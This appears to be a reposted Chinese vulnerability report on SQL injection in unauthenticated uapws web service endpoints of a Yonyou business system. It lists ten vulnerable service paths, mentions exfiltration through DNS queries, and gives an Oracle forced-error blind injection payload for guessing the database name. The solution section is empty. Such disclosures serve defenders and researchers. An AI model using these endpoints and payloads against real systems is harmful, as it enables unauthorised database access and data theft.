频道栏目
首页 > 资讯 > 企业安全 > 正文

用友某系统多处注入漏洞打包

16-07-19        来源:[db:作者]  
收藏   我要投稿

wooyun搜了一下,没有人提,来一发。

首先,该接口是无需权限访问的。

已http://**.**.**.**/bugs/wooyun-2010-0178322为例:

**.**.**.**:8080/uapws/service/nc.itf.bd.crm.ICurrtypeExportToCrmService?wsdl

**.**.**.**:8080/uapws/service/nc.itf.bd.crm.IInvbasdocExportToCrmService?wsdl

**.**.**.**:8080/uapws/service/nc.itf.bd.crm.IMeasdocExportToCrmService?wsdl

**.**.**.**:8080/uapws/service/nc.itf.bd.crm.IInvclExportToCrmService?wsdl

**.**.**.**:8080/uapws/service/nc.itf.bd.crm.ICustomerExportToCrmService?wsdl

**.**.**.**:8080/uapws/service/nc.itf.bd.crm.IAreaclExportToCrmService?wsdl

**.**.**.**:8080/uapws/service/nc.itf.bd.crm.ICustomerImportToNcService?wsdl

**.**.**.**:8080/uapws/service/nc.itf.bd.crm.ICorpExportToCrmService?wsdl

**.**.**.**:8080/uapws/service/nc.itf.bd.crm.IPsndocExportToCrmService?wsdl

**.**.**.**:8080/uapws/service/nc.itf.bd.crm.IUserExportToCrmService?wsdl

均存在注入

 

04184.png

 

 

04185.png

 

无法报错注入的,因为我们填充的数据是随意填充的,也没有办法盲注,可以使用dns查询的方式。

**.**.**.**:8080/uapws/service/nc.itf.bd.crm.ICurrtypeExportToCrmService

 

04186.png

 

还有一种情况是无法报错注入,也不能盲注,延时也不可以,可以使用强制报错盲注的办法:

'and 1=(SELECT (CASE WHEN (length((select SYS_CONTEXT('USERENV','DB_NAME') from dual))=4) THEN 1 ELSE CAST('a' AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)-- 来猜解数据。

http://**.**.**.**:9090/

解决方案:

相关TAG标签
上一篇:看我如何1块钱买价值3999块钱的嗨镜(京东众筹破2百万)支付漏洞
下一篇:某大型第三方支付机构账户体系控制不严导致的血案(影响企业金融信息)
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站